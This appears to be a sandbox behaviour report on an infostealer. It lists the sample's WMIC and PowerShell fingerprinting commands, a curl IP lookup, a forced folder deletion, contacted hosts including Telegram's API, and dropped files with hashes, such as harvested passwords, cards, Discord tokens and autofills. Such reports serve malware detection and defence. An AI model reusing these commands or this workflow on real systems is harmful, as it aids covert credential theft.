C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:49851 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| DE | 49.13.193.134:443 | api.filedoge.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:49966 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 34.117.118.44:443 | www.myexternalip.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 172.67.205.179:443 | mrbfederali.cam | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:49989 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50006 | tcp | |
| N/A | 127.0.0.1:50026 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50046 | tcp | |
| N/A | 127.0.0.1:50092 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50130 | tcp | |
| N/A | 127.0.0.1:50150 | tcp | |
| N/A | 127.0.0.1:50176 | tcp | |
| N/A | 127.0.0.1:80 | tcp | |
| N/A | 127.0.0.1:50207 | tcp | |
| N/A | 127.0.0.1:50227 | tcp | |
| N/A | 127.0.0.1:50247 | tcp | |
| N/A | 127.0.0.1:50267 | tcp | |
| GB | 184.28.176.19:443 | tcp | |
| US | 13.89.178.27:443 | browser.pipe.aria.microsoft.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
| NL | 23.62.61.72:443 | r.bing.com | tcp |
Files
memory/896-0-0x00007FFFFCD43000-0x00007FFFFCD45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jeebskcv.gpp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/896-10-0x000001A41EDB0000-0x000001A41EDD2000-memory.dmp
memory/896-9-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp
memory/896-11-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp
memory/896-12-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
| MD5 | 8eacf3f9be7e3735352c4020fc4e05e9 |
| SHA1 | 0bb6c048d9e683e152de21f7d368a4c151095504 |
| SHA256 | 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e |
| SHA512 | 2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0 |
memory/896-25-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
| MD5 | 66a65322c9d362a23cf3d3f7735d5430 |
| SHA1 | ed59f3e4b0b16b759b866ef7293d26a1512b952e |
| SHA256 | f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c |
| SHA512 | 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21 |
C:\Users\Admin\AppData\Local\Temp\Executor\temp.ps1
| MD5 | 18047e197c6820559730d01035b2955a |
| SHA1 | 277179be54bba04c0863aebd496f53b129d47464 |
| SHA256 | 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3 |
| SHA512 | 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
memory/1008-108-0x0000020CCCD80000-0x0000020CCCDC6000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.cmdline
| MD5 | 84c078e4db612b0dafa3de8198b996c1 |
| SHA1 | 2361ae986c022878d0ca959887e68a6a14f05705 |
| SHA256 | 62cab83c1405342619af0c32ffbd051ac370a15f283486994d00724fe2eac531 |
| SHA512 | ead7d1cf58530ea65387a71ca6c8aff8ae031544e914b2cde7deb3271ed7f92389fd5054c9c7b80fd3b1e2bce6017d86809211980acc1ce58b10b4bc74969209 |
\??\c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.0.cs
| MD5 | 7bc8de6ac8041186ed68c07205656943 |
| SHA1 | 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75 |
| SHA256 | 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697 |
| SHA512 | 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba |
\??\c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\CSCF175916096AE4A709A7D4E890657D51.TMP
| MD5 | 3995921343802870743f360b5290b4d3 |
| SHA1 | de04cb85bf6f53b45a74dbe80d2646077af3cb12 |
| SHA256 | 5ebd1ff57d9729443caf371d0f34dce16c6bf5fab37fcb358d269168c0124148 |
| SHA512 | 7499600eba32de4aa4159c195157387366265e4a279453b3572d9bb7e840045757fc22ccf817228d7accc1c2a79f55571013f9f77489f3ace5db5f580bac79bb |
C:\Users\Admin\AppData\Local\Temp\RES8CDE.tmp
| MD5 | 09e347f4faa2a5b4e6a022b95c5f3c59 |
| SHA1 | 6161f7233fb3add8cd72b5a379affafb549f66e7 |
| SHA256 | 26b588bc711a7bab1583720fb4a642ed88020dd38c40836f92f1ff531f69b0c1 |
| SHA512 | 3ca8ba258888da4ac876118d4d3552878ae014e246c4a8c2e02be59bffe54ba7a98297b9006a17883c3bfb458876df31a97adec59fb8097e7a8df416ce045f47 |
memory/1008-121-0x0000020CCC8F0000-0x0000020CCC8F8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.dll
| MD5 | fd5e45a81ce79a95fc3688599b3e7c28 |
| SHA1 | c24801a296a061bd50a56f6263b696c1532dfb77 |
| SHA256 | 8cf7e867986c516ef5cdd55060da798c49508557a3a01df2843ad52fea0032a2 |
| SHA512 | 933feb0a1191f75a874f95633fd34b0de154e8571dc495a4c94bad2b2e56238450d0502cbe50af4b6abd847bd9190af541746e9669ab99a0f5a1b7b63cb9c119 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e6baeec02c3d93dce26652e7acebc90 |
| SHA1 | 937a7b4a0d42ea56e21a1a00447d899a2aca3c28 |
| SHA256 | 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0 |
| SHA512 | 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4 |
memory/4584-134-0x000002A357BF0000-0x000002A357C40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6b60063de9d34ef9fcca516b9aa3e024 |
| SHA1 | 5041e194dd6a879dc811f69c46bb6490d7012f85 |
| SHA256 | 22166d037fb310b137e38f5a622c0675bd3834ec04743cb9a737cd797990d36b |
| SHA512 | 0335951eec844cfa869efbbb15e58c9bbd36c1f26d4859c5f4c2f6878b14ff4dba704f6ae05340eaec4fbb738a10a283d4d5df36a9ffbc9e22ddfc8765917a55 |
C:\ProgramData\Steam\Launcher\EN-Ngomewng\debug.log
| MD5 | 170569906646d8cc72bf8ab80e606b7e |
| SHA1 | 69afd238f8b58c4d637ae4796ed9bdc2a82811d3 |
| SHA256 | a30a91f63953a04da97cd2ef6737c068d3375bacd7bfcb62e5e58a8eb8439261 |
| SHA512 | 97df20770eaf89b312abf961a9f8876bf7338e327cf96eeb0367497b4823428682b019a94c0cacb078523ae805ecf905abea6545664b31428095b7f4dbdf5ef4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ae09b9726ad193e95ef8ec470a3dfafb |
| SHA1 | 451e263a3c9fc8011c29ca04a56cc4a632b33efd |
| SHA256 | 065a26846f8eb0e69adbafdbb536dfb627f9c739ab011c7f01b07e5db9ff4786 |
| SHA512 | fa3443e3f985d37f5774ab8492a13b058c0015d65777d736d52c3239517c53560a6465f0f962aa150c8a6434d0604a8aae095ee129bf20542e468810d9d2a796 |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | a8834c224450d76421d8e4a34b08691f |
| SHA1 | 73ed4011bc60ba616b7b81ff9c9cad82fb517c68 |
| SHA256 | 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5 |
| SHA512 | 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596 |
C:\ProgramData\edge\Updater\RunBatHidden.vbs
| MD5 | 14a9867ec0265ebf974e440fcd67d837 |
| SHA1 | ae0e43c2daf4c913f5db17f4d9197f34ab52e254 |
| SHA256 | cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1 |
| SHA512 | 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54 |
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat
| MD5 | 05ec53e2d2d9867bc93e34e694faec45 |
| SHA1 | 221d09c47199869538f2b541afa736c03c8d9579 |
| SHA256 | ec3ea75321fd8f902276f09b944f01186137b1df0032cd0b19f1cb4772f3c55f |
| SHA512 | a31b105c05b4414c299cfd937757514e293da2772b905a185da21817edf29e6e22c25ad196976a774ba8352550f8d4c1735dbf9a10074e384abfb912e54aa011 |
\??\c:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.cmdline
| MD5 | ab2678028b4b5acc379ddf06c27edfe2 |
| SHA1 | 3d5d97b4f1e023ba75e4b53419894de6b6c5481a |
| SHA256 | 8dee71b205d053ad7ee1d6fb1d7f6ff7e2c88c6d1834c88faba1ece9e71484a4 |
| SHA512 | 2b131a281d58374abc44e7450c40da61044092ff9044e7a79ea77bb11ee643167b5b60ddaf5b5b2c49e9c348d7d8c5aee55e79a87721988b45f2d4ecb87bad0f |
\??\c:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\tqr0iaas\CSC4E6C8135414A4B0683AD5297B3316BA.TMP
| MD5 | 3d98006292c05aafbc193b92089bb574 |
| SHA1 | 048af404a72526ef02a2a94a7ccf8cbdb3cf3e01 |
| SHA256 | 90ab17faca327bb2927b60bd47f769b368debe86569c019d8cf5baf26813997c |
| SHA512 | 08f50f4a687ddc5994dba7f666a2f4c11e1dfc3024acca324f31bea5ff4bf29db4f609c3f6746c628b09606189d074b5e409e72dfda87043047372a377323a2c |
C:\Users\Admin\AppData\Local\Temp\RES93B4.tmp
| MD5 | 1ca7f72cdd1e421f17024115e07a9f3f |
| SHA1 | 5ae2075d60ce3345bc7ba0a99cb18dcc7728fa3d |
| SHA256 | 3f138ea24478bc40492f6060b95ebd61de0d4db1cc39fb7e0d6ae424d97e788e |
| SHA512 | 76a3873551bb53bbdef43ba3a886eaf8cbcacba6b0f1a21f63f859f06e942666227dec1170732e513c72c50fe25b38768f6e41f55e19c7eafebf7a855fd2d313 |
C:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.dll
| MD5 | df35ffc67c8198139c15b37bfb0def7c |
| SHA1 | f64cd45c07d665ac4e6e095903f644a1251ceb80 |
| SHA256 | c402621b6d2ed99339b161b4d62c0201c14a96453f45eea3512c5acc06f912f4 |
| SHA512 | e7a76f86b6b8b96c02acbfa0c6f3a4c361f238511470b40eebc40d24cf6b8effe2c413a3f8297c2e5cca51f767722b0bbbca5069a386d85823587dcc6f58553f |
memory/940-207-0x000001DE02F60000-0x000001DE02F68000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cbe5bd1c677a86e505e8afbba76d32d1 |
| SHA1 | 6781b00d2efbb52232baa535484d0281b2341abc |
| SHA256 | 49cc9b9ddec232d1389a770220462e1d940567b9b945da92cfd5d0413d966571 |
| SHA512 | aeec87fd93836d8fdd7cf9f7890509f2ea896fe5447fd108bd31f28fc3a19f68c30b585bf8fe02faef8357753036474c7fbe2fa812581efc0a58d5e1c22a64d9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a7f03a7ad1cae046d8ceac04256e5ae |
| SHA1 | ef0bf767c91cba32b33c0b48f74f5eb153ae43d3 |
| SHA256 | e8aa3162f519e3670b0fc79dfbeeca68ea2b65a17900cf3aafc6a48de3296d60 |
| SHA512 | 382a91848be121734bce9f533bcb4747e5f21db5b1ea5dfc8cc567005f5be0f1dcc73a55516b83feb931cdc90601ed4d36fb890687f08e1056ff98da2365f01d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0e0266e9b8595afad38e3aeeb7ac9e79 |
| SHA1 | d7f76538c8f2b58b6815fe7f4d3038d4d920a45f |
| SHA256 | 27bc56e8dd548d29e61b6b8654730b0b30f8d96c7f37ef5c204d4100ee297d43 |
| SHA512 | f6e294475d8c96792311bfc8b452a89ca7fb8fdcb127b04e773172f7df0d4e15b30bbd60c9cd6311e442d74a140411c860439afaaa968f05922c73599a0695a4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\ProgramData\Steam\Launcher\EN-Ngomewng\stolen_files.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
C:\ProgramData\Steam\Launcher\EN-Ngomewng\Serial-Check.txt
| MD5 | da9ff194886fd99e758d9ca908666e7b |
| SHA1 | 6de3fbe2aa5f32663a90576ade7fe2e6de78a7fc |
| SHA256 | 0648664f7a0211656e5afa131baa05d5244b86aa762c8a788f9a3b76bd9a6870 |
| SHA512 | 549d7d0b945ab396e81055e66ddb1d0dafc309e7371c0a62801cc3625da36c9e4e162f3d005491236fbfbdf7df63c3f6bcbf942ec270385c190f1d1ef393f3c0 |
C:\ProgramData\Steam\Launcher\EN-Ngomewng\Passwords\Passwords.txt
| MD5 | c5e74f3120dbbd446a527e785dfe6d66 |
| SHA1 | 11997c2a53d19fd20916e49411c7a61bfb590e9c |
| SHA256 | e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05 |
| SHA512 | a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f |
C:\ProgramData\Steam\Launcher\EN-Ngomewng\Discord\discord.txt
| MD5 | 675951f6d9d75fd2c9c06b5ff547c6fd |
| SHA1 | 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09 |
| SHA256 | 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244 |
| SHA512 | 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea |
C:\ProgramData\Steam\Launcher\EN-Ngomewng\debug.log
| MD5 | 018a4ca87012f367b1d3b8c58ce5a8ed |
| SHA1 | 6812ae42fdf463564e060b88a6066ffcb3583102 |
| SHA256 | 8ee69733b3ad621d5f4a8fff9100b3c8be00092d5efd2e4ced33d16b96a5f21c |
| SHA512 | e418296946b2705acbcdc2dc85658f4a3c1fd2c74d53398b8ffc67625ea77d2bfc02fc305358d6ed04e7fa9222148b562238690fed451866efa8c0ad3cf9c4e7 |
C:\ProgramData\Steam\Launcher\EN-Ngomewng\Cards\Cards.txt
| MD5 | 8a0ed121ee275936bf62b33f840db290 |
| SHA1 | 898770c85b05670ab1450a96ea6fbd46e6310ef6 |
| SHA256 | 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709 |
| SHA512 | 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154 |
C:\ProgramData\Steam\Launcher\EN-Ngomewng\Autofills\Autofills.txt
| MD5 | 2f308e49fe62fbc51aa7a9b987a630fe |
| SHA1 | 1b9277da78babd9c5e248b66ba6ab16c77b97d0b |
| SHA256 | d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521 |
| SHA512 | c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024 |
C:\ProgramData\Steam\Launcher\EN-Ngomewng.zip
| MD5 | 0d48a4292c3d48db3ca75697ef99c794 |
| SHA1 | 42c0f20cf57be70a5c67ab15be81651b65ae35d9 |
| SHA256 | 565158ce8f4197490dce177667cc3b3b84511cef9bf3eecc68abc0a83be916e2 |
| SHA512 | 19d5f5e06d9378dd5edee6e1b8de8cc2b7c0f8205a86bd3240da52c9dd16b7727a7aea19657ddf19add237d1e2ac82fbf96966a3d88b260be98aae7e0c1e01b4 |
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1
